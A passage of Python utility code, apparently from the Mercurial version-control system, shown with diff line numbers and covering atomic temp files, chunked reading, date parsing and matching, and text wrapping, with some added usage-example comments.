1800 1804 rename(self._tempname, filename)
1801 1805
1802 1806 def discard(self):
1803 1807 if not self._fp.closed:
1804 1808 try:
1805 1809 os.unlink(self._tempname)
1806 1810 except OSError:
1807 1811 pass
1808 1812 self._fp.close()
1809 1813
1810 1814 def __del__(self):
1811 1815 if safehasattr(self, '_fp'): # constructor actually did something
1812 1816 self.discard()
1813 1817
1814 1818 def __enter__(self):
1815 1819 return self
1816 1820
1817 1821 def __exit__(self, exctype, excvalue, traceback):
1818 1822 if exctype is not None:
1819 1823 self.discard()
1820 1824 else:
1821 1825 self.close()
1822 1826
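# Illustrative sketch (not part of the original module): atomictempfile as
# a context manager. A clean exit renames the temporary copy over 'config'
# in one step; an exception discards every write. The path and content are
# hypothetical.
#
#     with atomictempfile('config', mode='wb', checkambig=True) as fp:
#         fp.write(b'[section]\n')
#         fp.write(b'key = value\n')
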
1823 1827 def unlinkpath(f, ignoremissing=False):
1824 1828 """unlink and remove the directory if it is empty"""
1825 1829 if ignoremissing:
1826 1830 tryunlink(f)
1827 1831 else:
1828 1832 unlink(f)
1829 1833 # try removing directories that might now be empty
1830 1834 try:
1831 1835 removedirs(os.path.dirname(f))
1832 1836 except OSError:
1833 1837 pass
1834 1838
1835 1839 def tryunlink(f):
1836 1840 """Attempt to remove a file, ignoring ENOENT errors."""
1837 1841 try:
1838 1842 unlink(f)
1839 1843 except OSError as e:
1840 1844 if e.errno != errno.ENOENT:
1841 1845 raise
1842 1846
1843 1847 def makedirs(name, mode=None, notindexed=False):
1844 1848 """recursive directory creation with parent mode inheritance
1845 1849
1846 1850 Newly created directories are marked as "not to be indexed by
1847 1851 the content indexing service", if ``notindexed`` is specified
1848 1852 for "write" mode access.
1849 1853 """
1850 1854 try:
1851 1855 makedir(name, notindexed)
1852 1856 except OSError as err:
1853 1857 if err.errno == errno.EEXIST:
1854 1858 return
1855 1859 if err.errno != errno.ENOENT or not name:
1856 1860 raise
1857 1861 parent = os.path.dirname(os.path.abspath(name))
1858 1862 if parent == name:
1859 1863 raise
1860 1864 makedirs(parent, mode, notindexed)
1861 1865 try:
1862 1866 makedir(name, notindexed)
1863 1867 except OSError as err:
1864 1868 # Catch EEXIST to handle races
1865 1869 if err.errno == errno.EEXIST:
1866 1870 return
1867 1871 raise
1868 1872 if mode is not None:
1869 1873 os.chmod(name, mode)
1870 1874
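# Illustrative sketch (not part of the original module): creating a nested
# cache directory, relying on makedirs() above to tolerate EEXIST races
# with concurrent processes. The path and mode are hypothetical.
#
#     makedirs(b'.hg/cache/tags', mode=0o755)
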
1871 1875 def readfile(path):
1872 1876 with open(path, 'rb') as fp:
1873 1877 return fp.read()
1874 1878
1875 1879 def writefile(path, text):
1876 1880 with open(path, 'wb') as fp:
1877 1881 fp.write(text)
1878 1882
1879 1883 def appendfile(path, text):
1880 1884 with open(path, 'ab') as fp:
1881 1885 fp.write(text)
1882 1886
1883 1887 class chunkbuffer(object):
1884 1888 """Allow arbitrary sized chunks of data to be efficiently read from an
1885 1889 iterator over chunks of arbitrary size."""
1886 1890
1887 1891 def __init__(self, in_iter):
1888 1892 """in_iter is the iterator that's iterating over the input chunks."""
1889 1893 def splitbig(chunks):
1890 1894 for chunk in chunks:
1891 1895 if len(chunk) > 2**20:
1892 1896 pos = 0
1893 1897 while pos < len(chunk):
1894 1898 end = pos + 2 ** 18
1895 1899 yield chunk[pos:end]
1896 1900 pos = end
1897 1901 else:
1898 1902 yield chunk
1899 1903 self.iter = splitbig(in_iter)
1900 1904 self._queue = collections.deque()
1901 1905 self._chunkoffset = 0
1902 1906
1903 1907 def read(self, l=None):
1904 1908 """Read L bytes of data from the iterator of chunks of data.
1905 1909 Returns less than L bytes if the iterator runs dry.
1906 1910
1907 1911 If size parameter is omitted, read everything"""
1908 1912 if l is None:
1909 1913 return ''.join(self.iter)
1910 1914
1911 1915 left = l
1912 1916 buf = []
1913 1917 queue = self._queue
1914 1918 while left > 0:
1915 1919 # refill the queue
1916 1920 if not queue:
1917 1921 target = 2**18
1918 1922 for chunk in self.iter:
1919 1923 queue.append(chunk)
1920 1924 target -= len(chunk)
1921 1925 if target <= 0:
1922 1926 break
1923 1927 if not queue:
1924 1928 break
1925 1929
1926 1930 # The easy way to do this would be to queue.popleft(), modify the
1927 1931 # chunk (if necessary), then queue.appendleft(). However, for cases
1928 1932 # where we read partial chunk content, this incurs 2 dequeue
1929 1933 # mutations and creates a new str for the remaining chunk in the
1930 1934 # queue. Our code below avoids this overhead.
1931 1935
1932 1936 chunk = queue[0]
1933 1937 chunkl = len(chunk)
1934 1938 offset = self._chunkoffset
1935 1939
1936 1940 # Use full chunk.
1937 1941 if offset == 0 and left >= chunkl:
1938 1942 left -= chunkl
1939 1943 queue.popleft()
1940 1944 buf.append(chunk)
1941 1945 # self._chunkoffset remains at 0.
1942 1946 continue
1943 1947
1944 1948 chunkremaining = chunkl - offset
1945 1949
1946 1950 # Use all of unconsumed part of chunk.
1947 1951 if left >= chunkremaining:
1948 1952 left -= chunkremaining
1949 1953 queue.popleft()
1950 1954 # offset == 0 is enabled by block above, so this won't merely
1951 1955 # copy via ``chunk[0:]``.
1952 1956 buf.append(chunk[offset:])
1953 1957 self._chunkoffset = 0
1954 1958
1955 1959 # Partial chunk needed.
1956 1960 else:
1957 1961 buf.append(chunk[offset:offset + left])
1958 1962 self._chunkoffset += left
1959 1963 left -= chunkremaining
1960 1964
1961 1965 return ''.join(buf)
1962 1966
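# Illustrative sketch (not part of the original module): chunkbuffer turns
# an iterator of arbitrarily sized chunks into a reader with exact-length
# reads, short only when the iterator runs dry.
#
#     buf = chunkbuffer(iter([b'abc', b'defghij', b'k']))
#     buf.read(5)  # -> 'abcde'
#     buf.read(5)  # -> 'fghij'
#     buf.read(5)  # -> 'k' (iterator ran dry; short read)
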
1963 1967 def filechunkiter(f, size=131072, limit=None):
1964 1968 """Create a generator that produces the data in the file size
1965 1969 (default 131072) bytes at a time, up to optional limit (default is
1966 1970 to read all data). Chunks may be less than size bytes if the
1967 1971 chunk is the last chunk in the file, or the file is a socket or
1968 1972 some other type of file that sometimes reads less data than is
1969 1973 requested."""
1970 1974 assert size >= 0
1971 1975 assert limit is None or limit >= 0
1972 1976 while True:
1973 1977 if limit is None:
1974 1978 nbytes = size
1975 1979 else:
1976 1980 nbytes = min(limit, size)
1977 1981 s = nbytes and f.read(nbytes)
1978 1982 if not s:
1979 1983 break
1980 1984 if limit:
1981 1985 limit -= len(s)
1982 1986 yield s
1983 1987
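# Illustrative sketch (not part of the original module): copying at most
# 1 MiB between two already-open file objects in bounded-memory chunks
# ('src' and 'dst' are hypothetical).
#
#     for chunk in filechunkiter(src, size=65536, limit=2**20):
#         dst.write(chunk)
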
1984 1988 class cappedreader(object):
1985 1989 """A file object proxy that allows reading up to N bytes.
1986 1990
1987 1991 Given a source file object, instances of this type allow reading up to
1988 1992 N bytes from that source file object. Attempts to read past the allowed
1989 1993 limit are treated as EOF.
1990 1994
1991 1995 It is assumed that I/O is not performed on the original file object
1992 1996 in addition to the I/O performed by this instance. If it is,
1993 1997 state tracking will get out of sync and unexpected results will ensue.
1994 1998 """
1995 1999 def __init__(self, fh, limit):
1996 2000 """Allow reading up to <limit> bytes from <fh>."""
1997 2001 self._fh = fh
1998 2002 self._left = limit
1999 2003
2000 2004 def read(self, n=-1):
2001 2005 if not self._left:
2002 2006 return b''
2003 2007
2004 2008 if n < 0:
2005 2009 n = self._left
2006 2010
2007 2011 data = self._fh.read(min(n, self._left))
2008 2012 self._left -= len(data)
2009 2013 assert self._left >= 0
2010 2014
2011 2015 return data
2012 2016
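# Illustrative sketch (not part of the original module): confining a
# consumer to one frame of a length-prefixed stream ('fh', 'framelen' and
# 'process' are hypothetical).
#
#     frame = cappedreader(fh, framelen)
#     while True:
#         data = frame.read(4096)
#         if not data:  # frame limit (or underlying EOF) reached
#             break
#         process(data)
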
2013 2017 def makedate(timestamp=None):
2014 2018 '''Return a unix timestamp (or the current time) as a (unixtime,
2015 2019 offset) tuple based on the local timezone.'''
2016 2020 if timestamp is None:
2017 2021 timestamp = time.time()
2018 2022 if timestamp < 0:
2019 2023 hint = _("check your clock")
2020 2024 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2021 2025 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2022 2026 datetime.datetime.fromtimestamp(timestamp))
2023 2027 tz = delta.days * 86400 + delta.seconds
2024 2028 return timestamp, tz
2025 2029
2026 2030 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2027 2031 """represent a (unixtime, offset) tuple as a localized time.
2028 2032 unixtime is seconds since the epoch, and offset is the time zone's
2029 2033 number of seconds away from UTC.
2030 2034
2031 2035 >>> datestr((0, 0))
2032 2036 'Thu Jan 01 00:00:00 1970 +0000'
2033 2037 >>> datestr((42, 0))
2034 2038 'Thu Jan 01 00:00:42 1970 +0000'
2035 2039 >>> datestr((-42, 0))
2036 2040 'Wed Dec 31 23:59:18 1969 +0000'
2037 2041 >>> datestr((0x7fffffff, 0))
2038 2042 'Tue Jan 19 03:14:07 2038 +0000'
2039 2043 >>> datestr((-0x80000000, 0))
2040 2044 'Fri Dec 13 20:45:52 1901 +0000'
2041 2045 """
2042 2046 t, tz = date or makedate()
2043 2047 if "%1" in format or "%2" in format or "%z" in format:
2044 2048 sign = (tz > 0) and "-" or "+"
2045 2049 minutes = abs(tz) // 60
2046 2050 q, r = divmod(minutes, 60)
2047 2051 format = format.replace("%z", "%1%2")
2048 2052 format = format.replace("%1", "%c%02d" % (sign, q))
2049 2053 format = format.replace("%2", "%02d" % r)
2050 2054 d = t - tz
2051 2055 if d > 0x7fffffff:
2052 2056 d = 0x7fffffff
2053 2057 elif d < -0x80000000:
2054 2058 d = -0x80000000
2055 2059 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2056 2060 # because they use the gmtime() system call which is buggy on Windows
2057 2061 # for negative values.
2058 2062 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2059 2063 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2060 2064 return s
2061 2065
2062 2066 def shortdate(date=None):
2063 2067 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2064 2068 return datestr(date, format='%Y-%m-%d')
2065 2069
2066 2070 def parsetimezone(s):
2067 2071 """find a trailing timezone, if any, in string, and return a
2068 2072 (offset, remainder) pair"""
2069 2073
2070 2074 if s.endswith("GMT") or s.endswith("UTC"):
2071 2075 return 0, s[:-3].rstrip()
2072 2076
2073 2077 # Unix-style timezones [+-]hhmm
2074 2078 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2075 2079 sign = (s[-5] == "+") and 1 or -1
2076 2080 hours = int(s[-4:-2])
2077 2081 minutes = int(s[-2:])
2078 2082 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2079 2083
2080 2084 # ISO8601 trailing Z
2081 2085 if s.endswith("Z") and s[-2:-1].isdigit():
2082 2086 return 0, s[:-1]
2083 2087
2084 2088 # ISO8601-style [+-]hh:mm
2085 2089 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2086 2090 s[-5:-3].isdigit() and s[-2:].isdigit()):
2087 2091 sign = (s[-6] == "+") and 1 or -1
2088 2092 hours = int(s[-5:-3])
2089 2093 minutes = int(s[-2:])
2090 2094 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2091 2095
2092 2096 return None, s
2093 2097
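# Illustrative sketch (not part of the original module): sample return
# values. Offsets follow the convention used in strdate() below
# (unixtime = localunixtime + offset), so east-of-UTC zones yield
# negative offsets.
#
#     parsetimezone(b'2017-01-01 10:00 +0200')  # -> (-7200, '2017-01-01 10:00')
#     parsetimezone(b'10:00 GMT')               # -> (0, '10:00')
#     parsetimezone(b'10:00')                   # -> (None, '10:00')
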
2094 2098 def strdate(string, format, defaults=None):
2095 2099 """parse a localized time string and return a (unixtime, offset) tuple.
2096 2100 If the string cannot be parsed, ValueError is raised."""
2097 2101 if defaults is None:
2098 2102 defaults = {}
2099 2103
2100 2104 # NOTE: unixtime = localunixtime + offset
2101 2105 offset, date = parsetimezone(string)
2102 2106
2103 2107 # add missing elements from defaults
2104 2108 usenow = False # default to using biased defaults
2105 2109 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2106 2110 part = pycompat.bytestr(part)
2107 2111 found = [True for p in part if ("%"+p) in format]
2108 2112 if not found:
2109 2113 date += "@" + defaults[part][usenow]
2110 2114 format += "@%" + part[0]
2111 2115 else:
2112 2116 # We've found a specific time element, less specific time
2113 2117 # elements are relative to today
2114 2118 usenow = True
2115 2119
2116 2120 timetuple = time.strptime(encoding.strfromlocal(date),
2117 2121 encoding.strfromlocal(format))
2118 2122 localunixtime = int(calendar.timegm(timetuple))
2119 2123 if offset is None:
2120 2124 # local timezone
2121 2125 unixtime = int(time.mktime(timetuple))
2122 2126 offset = unixtime - localunixtime
2123 2127 else:
2124 2128 unixtime = localunixtime + offset
2125 2129 return unixtime, offset
2126 2130
2127 2131 def parsedate(date, formats=None, bias=None):
2128 2132 """parse a localized date/time and return a (unixtime, offset) tuple.
2129 2133
2130 2134 The date may be a "unixtime offset" string or in one of the specified
2131 2135 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2132 2136
2133 2137 >>> parsedate(b' today ') == parsedate(
2134 2138 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2135 2139 True
2136 2140 >>> parsedate(b'yesterday ') == parsedate(
2137 2141 ... (datetime.date.today() - datetime.timedelta(days=1)
2138 2142 ... ).strftime('%b %d').encode('ascii'))
2139 2143 True
2140 2144 >>> now, tz = makedate()
2141 2145 >>> strnow, strtz = parsedate(b'now')
2142 2146 >>> (strnow - now) < 1
2143 2147 True
2144 2148 >>> tz == strtz
2145 2149 True
2146 2150 """
2147 2151 if bias is None:
2148 2152 bias = {}
2149 2153 if not date:
2150 2154 return 0, 0
2151 2155 if isinstance(date, tuple) and len(date) == 2:
2152 2156 return date
2153 2157 if not formats:
2154 2158 formats = defaultdateformats
2155 2159 date = date.strip()
2156 2160
2157 2161 if date == 'now' or date == _('now'):
2158 2162 return makedate()
2159 2163 if date == 'today' or date == _('today'):
2160 2164 date = datetime.date.today().strftime(r'%b %d')
2161 2165 date = encoding.strtolocal(date)
2162 2166 elif date == 'yesterday' or date == _('yesterday'):
2163 2167 date = (datetime.date.today() -
2164 2168 datetime.timedelta(days=1)).strftime(r'%b %d')
2165 2169 date = encoding.strtolocal(date)
2166 2170
2167 2171 try:
2168 2172 when, offset = map(int, date.split(' '))
2169 2173 except ValueError:
2170 2174 # fill out defaults
2171 2175 now = makedate()
2172 2176 defaults = {}
2173 2177 for part in ("d", "mb", "yY", "HI", "M", "S"):
2174 2178 # this piece is for rounding the specific end of unknowns
2175 2179 b = bias.get(part)
2176 2180 if b is None:
2177 2181 if part[0:1] in "HMS":
2178 2182 b = "00"
2179 2183 else:
2180 2184 b = "0"
2181 2185
2182 2186 # this piece is for matching the generic end to today's date
2183 2187 n = datestr(now, "%" + part[0:1])
2184 2188
2185 2189 defaults[part] = (b, n)
2186 2190
2187 2191 for format in formats:
2188 2192 try:
2189 2193 when, offset = strdate(date, format, defaults)
2190 2194 except (ValueError, OverflowError):
2191 2195 pass
2192 2196 else:
2193 2197 break
2194 2198 else:
2195 2199 raise error.ParseError(_('invalid date: %r') % date)
2196 2200 # validate explicit (probably user-specified) date and
2197 2201 # time zone offset. values must fit in signed 32 bits for
2198 2202 # current 32-bit linux runtimes. timezones go from UTC-12
2199 2203 # to UTC+14
2200 2204 if when < -0x80000000 or when > 0x7fffffff:
2201 2205 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2202 2206 if offset < -50400 or offset > 43200:
2203 2207 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2204 2208 return when, offset
2205 2209
2206 2210 def matchdate(date):
2207 2211 """Return a function that matches a given date match specifier
2208 2212
2209 2213 Formats include:
2210 2214
2211 2215 '{date}' match a given date to the accuracy provided
2212 2216
2213 2217 '<{date}' on or before a given date
2214 2218
2215 2219 '>{date}' on or after a given date
2216 2220
2217 2221 >>> p1 = parsedate(b"10:29:59")
2218 2222 >>> p2 = parsedate(b"10:30:00")
2219 2223 >>> p3 = parsedate(b"10:30:59")
2220 2224 >>> p4 = parsedate(b"10:31:00")
2221 2225 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2222 2226 >>> f = matchdate(b"10:30")
2223 2227 >>> f(p1[0])
2224 2228 False
2225 2229 >>> f(p2[0])
2226 2230 True
2227 2231 >>> f(p3[0])
2228 2232 True
2229 2233 >>> f(p4[0])
2230 2234 False
2231 2235 >>> f(p5[0])
2232 2236 False
2233 2237 """
2234 2238
2235 2239 def lower(date):
2236 2240 d = {'mb': "1", 'd': "1"}
2237 2241 return parsedate(date, extendeddateformats, d)[0]
2238 2242
2239 2243 def upper(date):
2240 2244 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2241 2245 for days in ("31", "30", "29"):
2242 2246 try:
2243 2247 d["d"] = days
2244 2248 return parsedate(date, extendeddateformats, d)[0]
2245 2249 except error.ParseError:
2246 2250 pass
2247 2251 d["d"] = "28"
2248 2252 return parsedate(date, extendeddateformats, d)[0]
2249 2253
2250 2254 date = date.strip()
2251 2255
2252 2256 if not date:
2253 2257 raise Abort(_("dates cannot consist entirely of whitespace"))
2254 2258 elif date[0] == "<":
2255 2259 if not date[1:]:
2256 2260 raise Abort(_("invalid day spec, use '<DATE'"))
2257 2261 when = upper(date[1:])
2258 2262 return lambda x: x <= when
2259 2263 elif date[0] == ">":
2260 2264 if not date[1:]:
2261 2265 raise Abort(_("invalid day spec, use '>DATE'"))
2262 2266 when = lower(date[1:])
2263 2267 return lambda x: x >= when
2264 2268 elif date[0] == "-":
2265 2269 try:
2266 2270 days = int(date[1:])
2267 2271 except ValueError:
2268 2272 raise Abort(_("invalid day spec: %s") % date[1:])
2269 2273 if days < 0:
2270 2274 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2271 2275 % date[1:])
2272 2276 when = makedate()[0] - days * 3600 * 24
2273 2277 return lambda x: x >= when
2274 2278 elif " to " in date:
2275 2279 a, b = date.split(" to ")
2276 2280 start, stop = lower(a), upper(b)
2277 2281 return lambda x: x >= start and x <= stop
2278 2282 else:
2279 2283 start, stop = lower(date), upper(date)
2280 2284 return lambda x: x >= start and x <= stop
2281 2285
2282 2286 def stringmatcher(pattern, casesensitive=True):
2283 2287 """
2284 2288 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2285 2289 returns the matcher name, pattern, and matcher function.
2286 2290 missing or unknown prefixes are treated as literal matches.
2287 2291
2288 2292 helper for tests:
2289 2293 >>> def test(pattern, *tests):
2290 2294 ... kind, pattern, matcher = stringmatcher(pattern)
2291 2295 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2292 2296 >>> def itest(pattern, *tests):
2293 2297 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2294 2298 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2295 2299
2296 2300 exact matching (no prefix):
2297 2301 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2298 2302 ('literal', 'abcdefg', [False, False, True])
2299 2303
2300 2304 regex matching ('re:' prefix)
2301 2305 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2302 2306 ('re', 'a.+b', [False, False, True])
2303 2307
2304 2308 force exact matches ('literal:' prefix)
2305 2309 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2306 2310 ('literal', 're:foobar', [False, True])
2307 2311
2308 2312 unknown prefixes are ignored and treated as literals
2309 2313 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2310 2314 ('literal', 'foo:bar', [False, False, True])
2311 2315
2312 2316 case insensitive regex matches
2313 2317 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2314 2318 ('re', 'A.+b', [False, False, True])
2315 2319
2316 2320 case insensitive literal matches
2317 2321 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2318 2322 ('literal', 'ABCDEFG', [False, False, True])
2319 2323 """
2320 2324 if pattern.startswith('re:'):
2321 2325 pattern = pattern[3:]
2322 2326 try:
2323 2327 flags = 0
2324 2328 if not casesensitive:
2325 2329 flags = remod.I
2326 2330 regex = remod.compile(pattern, flags)
2327 2331 except remod.error as e:
2328 2332 raise error.ParseError(_('invalid regular expression: %s')
2329 2333 % e)
2330 2334 return 're', pattern, regex.search
2331 2335 elif pattern.startswith('literal:'):
2332 2336 pattern = pattern[8:]
2333 2337
2334 2338 match = pattern.__eq__
2335 2339
2336 2340 if not casesensitive:
2337 2341 ipat = encoding.lower(pattern)
2338 2342 match = lambda s: ipat == encoding.lower(s)
2339 2343 return 'literal', pattern, match
2340 2344
2341 2345 def shortuser(user):
2342 2346 """Return a short representation of a user name or email address."""
2343 2347 f = user.find('@')
2344 2348 if f >= 0:
2345 2349 user = user[:f]
2346 2350 f = user.find('<')
2347 2351 if f >= 0:
2348 2352 user = user[f + 1:]
2349 2353 f = user.find(' ')
2350 2354 if f >= 0:
2351 2355 user = user[:f]
2352 2356 f = user.find('.')
2353 2357 if f >= 0:
2354 2358 user = user[:f]
2355 2359 return user
2356 2360
2357 2361 def emailuser(user):
2358 2362 """Return the user portion of an email address."""
2359 2363 f = user.find('@')
2360 2364 if f >= 0:
2361 2365 user = user[:f]
2362 2366 f = user.find('<')
2363 2367 if f >= 0:
2364 2368 user = user[f + 1:]
2365 2369 return user
2366 2370
2367 2371 def email(author):
2368 2372 '''get email of author.'''
2369 2373 r = author.find('>')
2370 2374 if r == -1:
2371 2375 r = None
2372 2376 return author[author.find('<') + 1:r]
2373 2377
2374 2378 def ellipsis(text, maxlength=400):
2375 2379 """Trim string to at most maxlength (default: 400) columns in display."""
2376 2380 return encoding.trim(text, maxlength, ellipsis='...')
2377 2381
2378 2382 def unitcountfn(*unittable):
2379 2383 '''return a function that renders a readable count of some quantity'''
2380 2384
2381 2385 def go(count):
2382 2386 for multiplier, divisor, format in unittable:
2383 2387 if abs(count) >= divisor * multiplier:
2384 2388 return format % (count / float(divisor))
2385 2389 return unittable[-1][2] % count
2386 2390
2387 2391 return go
2388 2392
2389 2393 def processlinerange(fromline, toline):
2390 2394 """Check that linerange <fromline>:<toline> makes sense and return a
2391 2395 0-based range.
2392 2396
2393 2397 >>> processlinerange(10, 20)
2394 2398 (9, 20)
2395 2399 >>> processlinerange(2, 1)
2396 2400 Traceback (most recent call last):
2397 2401 ...
2398 2402 ParseError: line range must be positive
2399 2403 >>> processlinerange(0, 5)
2400 2404 Traceback (most recent call last):
2401 2405 ...
2402 2406 ParseError: fromline must be strictly positive
2403 2407 """
2404 2408 if toline - fromline < 0:
2405 2409 raise error.ParseError(_("line range must be positive"))
2406 2410 if fromline < 1:
2407 2411 raise error.ParseError(_("fromline must be strictly positive"))
2408 2412 return fromline - 1, toline
2409 2413
2410 2414 bytecount = unitcountfn(
2411 2415 (100, 1 << 30, _('%.0f GB')),
2412 2416 (10, 1 << 30, _('%.1f GB')),
2413 2417 (1, 1 << 30, _('%.2f GB')),
2414 2418 (100, 1 << 20, _('%.0f MB')),
2415 2419 (10, 1 << 20, _('%.1f MB')),
2416 2420 (1, 1 << 20, _('%.2f MB')),
2417 2421 (100, 1 << 10, _('%.0f KB')),
2418 2422 (10, 1 << 10, _('%.1f KB')),
2419 2423 (1, 1 << 10, _('%.2f KB')),
2420 2424 (1, 1, _('%.0f bytes')),
2421 2425 )
2422 2426
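# Illustrative sketch (not part of the original module): the first row of
# the table above whose 'multiplier * divisor' threshold the value reaches
# selects the format, so precision shrinks as magnitude grows.
#
#     bytecount(500)       # -> '500 bytes'
#     bytecount(2048)      # -> '2.00 KB'
#     bytecount(15 << 20)  # -> '15.0 MB'
#     bytecount(3 << 30)   # -> '3.00 GB'
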
2423 2427 # Matches a single EOL which can either be a CRLF where repeated CR
2424 2428 # are removed or a LF. We do not care about old Macintosh files, so a
2425 2429 # stray CR is an error.
2426 2430 _eolre = remod.compile(br'\r*\n')
2427 2431
2428 2432 def tolf(s):
2429 2433 return _eolre.sub('\n', s)
2430 2434
2431 2435 def tocrlf(s):
2432 2436 return _eolre.sub('\r\n', s)
2433 2437
2434 2438 if pycompat.oslinesep == '\r\n':
2435 2439 tonativeeol = tocrlf
2436 2440 fromnativeeol = tolf
2437 2441 else:
2438 2442 tonativeeol = pycompat.identity
2439 2443 fromnativeeol = pycompat.identity
2440 2444
2441 2445 def escapestr(s):
2442 2446 # call underlying function of s.encode('string_escape') directly for
2443 2447 # Python 3 compatibility
2444 2448 return codecs.escape_encode(s)[0]
2445 2449
2446 2450 def unescapestr(s):
2447 2451 return codecs.escape_decode(s)[0]
2448 2452
2449 2453 def forcebytestr(obj):
2450 2454 """Portably format an arbitrary object (e.g. exception) into a byte
2451 2455 string."""
2452 2456 try:
2453 2457 return pycompat.bytestr(obj)
2454 2458 except UnicodeEncodeError:
2455 2459 # non-ascii string, may be lossy
2456 2460 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2457 2461
2458 2462 def uirepr(s):
2459 2463 # Avoid double backslash in Windows path repr()
2460 2464 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2461 2465
2462 2466 # delay construction of the width-aware TextWrapper subclass
2463 2467 def MBTextWrapper(**kwargs):
2464 2468 class tw(textwrap.TextWrapper):
2465 2469 """
2466 2470 Extend TextWrapper for width-awareness.
2467 2471
2468 2472 Neither the number of 'bytes' in any encoding nor the number of
2469 2473 'characters' is appropriate for calculating terminal columns of a string.
2470 2474
2471 2475 The original TextWrapper implementation uses the built-in 'len()' directly,
2472 2476 so overriding is needed to use the width information of each character.
2473 2477
2474 2478 In addition, characters classified as 'ambiguous' width are
2475 2479 treated as wide in East Asian locales, but as narrow elsewhere.
2476 2480
2477 2481 This requires a user decision to determine the width of such characters.
2478 2482 """
2479 2483 def _cutdown(self, ucstr, space_left):
2480 2484 l = 0
2481 2485 colwidth = encoding.ucolwidth
2482 2486 for i in xrange(len(ucstr)):
2483 2487 l += colwidth(ucstr[i])
2484 2488 if space_left < l:
2485 2489 return (ucstr[:i], ucstr[i:])
2486 2490 return ucstr, ''
2487 2491
2488 2492 # overriding of base class
2489 2493 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2490 2494 space_left = max(width - cur_len, 1)
2491 2495
2492 2496 if self.break_long_words:
2493 2497 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2494 2498 cur_line.append(cut)
2495 2499 reversed_chunks[-1] = res
2496 2500 elif not cur_line:
2497 2501 cur_line.append(reversed_chunks.pop())
2498 2502
2499 2503 # this overriding code is imported from TextWrapper of Python 2.6
2500 2504 # to calculate columns of string by 'encoding.ucolwidth()'
2501 2505 def _wrap_chunks(self, chunks):
2502 2506 colwidth = encoding.ucolwidth
2503 2507
2504 2508 lines = []
2505 2509 if self.width <= 0:
2506 2510 raise ValueError("invalid width %r (must be > 0)" % self.width)
2507 2511
2508 2512 # Arrange in reverse order so items can be efficiently popped
2509 2513 # from a stack of chunks.
2510 2514 chunks.reverse()
2511 2515
2512 2516 while chunks:
2513 2517
2514 2518 # Start the list of chunks that will make up the current line.
2515 2519 # cur_len is just the length of all the chunks in cur_line.
2516 2520 cur_line = []
2517 2521 cur_len = 0
2518 2522
2519 2523 # Figure out which static string will prefix this line.
2520 2524 if lines:
2521 2525 indent = self.subsequent_indent
2522 2526 else:
2523 2527 indent = self.initial_indent
2524 2528
2525 2529 # Maximum width for this line.
2526 2530 width = self.width - len(indent)
2527 2531
2528 2532 # First chunk on line is whitespace -- drop it, unless this
2529 2533 # is the very beginning of the text (i.e. no lines started yet).
2530 2534 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2531 2535 del chunks[-1]
2532 2536
2533 2537 while chunks:
2534 2538 l = colwidth(chunks[-1])
2535 2539
2536 2540 # Can at least squeeze this chunk onto the current line.
2537 2541 if cur_len + l <= width:
2538 2542 cur_line.append(chunks.pop())
2539 2543 cur_len += l
2540 2544
2541 2545 # Nope, this line is full.
2542 2546 else:
2543 2547 break
2544 2548
2545 2549 # The current line is full, and the next chunk is too big to
2546 2550 # fit on *any* line (not just this one).
2547 2551 if chunks and colwidth(chunks[-1]) > width:
2548 2552 self._handle_long_word(chunks, cur_line, cur_len, width)
2549 2553
2550 2554 # If the last chunk on this line is all whitespace, drop it.
2551 2555 if (self.drop_whitespace and
2552 2556 cur_line and cur_line[-1].strip() == r''):
2553 2557 del cur_line[-1]
2554 2558
2555 2559 # Convert current line back to a string and store it in list
2556 2560 # of all lines (return value).
2557 2561 if cur_line:
2558 2562 lines.append(indent + r''.join(cur_line))
2559 2563
2560 2564 return lines
2561 2565
2562 2566 global MBTextWrapper
2563 2567 MBTextWrapper = tw
2564 2568 return tw(**kwargs)
2565 2569
2566 2570 def wrap(line, width, initindent='', hangindent=''):
2567 2571 maxindent = max(len(hangindent), len(initindent))
2568 2572 if width <= maxindent:
2569 2573 # adjust for weird terminal size
2570 2574 width = max(78, maxindent + 1)
2571 2575 line = line.decode(pycompat.sysstr(encoding.encoding),
2572 2576 pycompat.sysstr(encoding.encodingmode))
2573 2577 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2574 2578 pycompat.sysstr(encoding.encodingmode))
2575 2579 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2576 2580 pycompat.sysstr(encoding.encodingmode))
2577 2581 wrapper = MBTextWrapper(width=width,
2578 2582 initial_indent=initindent,
2579 2583 subsequent_indent=hangindent)
2580 2584 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2581 2585
